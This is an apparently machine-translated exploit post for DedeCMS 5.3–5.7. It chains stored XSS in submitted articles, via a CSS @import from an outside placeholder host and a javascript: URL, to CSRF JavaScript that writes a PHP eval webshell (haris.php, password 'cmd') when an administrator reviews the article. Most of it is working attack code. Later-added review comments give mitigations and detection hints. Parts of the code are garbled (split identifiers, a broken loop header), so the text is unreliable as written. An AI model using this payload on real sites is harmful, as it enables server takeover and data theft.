DeDecms xss pass to kill 0day attached getshell EXP-vulnerability warning-the black bar safety net

2011-06-25T00:00:00
ID MYHACK58:62201131026
Type myhack58
Reporter 佚名
Modified 2011-06-25T00:00:00

Description

Author: haris

Vulnerability cause: the editor's content filter is not strict, which allows a malicious script to run.

Currently only tested on versions 5.3 to 5.7. Earlier versions were not tested.

Here is a description of the method.

Three conditions:

  1. Registration is open

  2. Article submission is open

  3. The administrator actually reviews submitted articles — the weakest link in the chain.

As a registered member, publish an article.

Fill the content with:

<style>@im\port’\http://xxx.com/xss.css’;</style>

NewXSS. CXX

body{

background-image:url('javascript:document. write("")')

}

Newxss. js

Content

// Review note: this is the payload as published on the page, reproduced unchanged for
// analysis. It is delivered through the stored article content shown above and, per the
// writeup, runs in the browser of the administrator who reviews the article.
// Selects an XHR implementation: native XMLHttpRequest first, ActiveX fallback otherwise.
var request = false;

if(window. XMLHttpRequest) {

request = new XMLHttpRequest();

if(request. overrideMimeType) {

request. overrideMimeType('text/xml');

}

} else if(window. ActiveXObject) {

var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP'];

// NOTE(review): the loop header is incomplete in the page as extracted (no loop
// condition or increment survives); it is left exactly as published.
for(var i=0; i try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

// Implicit global (no var); shared with add_admin() below.
xmlhttp=request;

/**
 * Returns the second-to-last '/'-separated segment of `url`.
 * Used below on top.location.href, so this is presumably the name of the directory
 * containing the page being viewed — verify against the target URL layout.
 * `obj` is an implicit global (no var).
 * @param {string} url
 * @returns {string}
 */
function getFolder( url ){

obj = url. split('/')

return obj[obj. length-2]

}

// Take the folder segment of the top frame's URL (presumably the backend directory the
// reviewer is in) and fire the request immediately on load. Relies on function hoisting:
// add_admin is declared further down. oUrl and u are implicit globals.
oUrl = top. location. href;

u = getFolder(oUrl);

add_admin();

/**
 * Sends one POST to <folder>/sys_sql_query.php from the viewer's browser.
 * Despite its name this does not add an administrator: the form fields (fmdo=edit,
 * activepath=%2Fdata, filename=haris. php, str=<PHP source>) are a file-edit request that
 * writes a PHP file under the data directory, as the writeup's last line states.
 *
 * Risk (defender view): because it runs inside the reviewing administrator's session, the
 * request is sent with that session's credentials — a CSRF reached through stored XSS.
 * Mitigation: the file-write action behind sys_sql_query.php needs a per-session anti-CSRF
 * token rather than relying on cookies alone; the article editor must strip <style>,
 * @import and javascript: URLs from submitted content; a Content-Security-Policy that
 * disallows inline styles and untrusted style sources breaks the @import chain.
 * Detection: a POST to sys_sql_query.php with fmdo=edit and activepath=%2Fdata issued from
 * an article-review session, or a new .php file appearing under data/.
 */
function add_admin(){

var url= "/"+u+"/sys_sql_query.php";

var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris. php&str=%3C%3Fphp+eval%2 8%24_POST%5Bcmd%5D%2 9%3F%3E&B1=++%E4%BF%9D+%E5%AD%9 8++";

xmlhttp. open("POST", url, true);

xmlhttp. setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlhttp. setRequestHeader("Content-length", params. length);

xmlhttp. setRequestHeader("Connection", "Keep-Alive");

xmlhttp. send(params);

}

When an administrator reviews this article, a one-line PHP shell named haris.php is automatically created in the data directory; its password is cmd.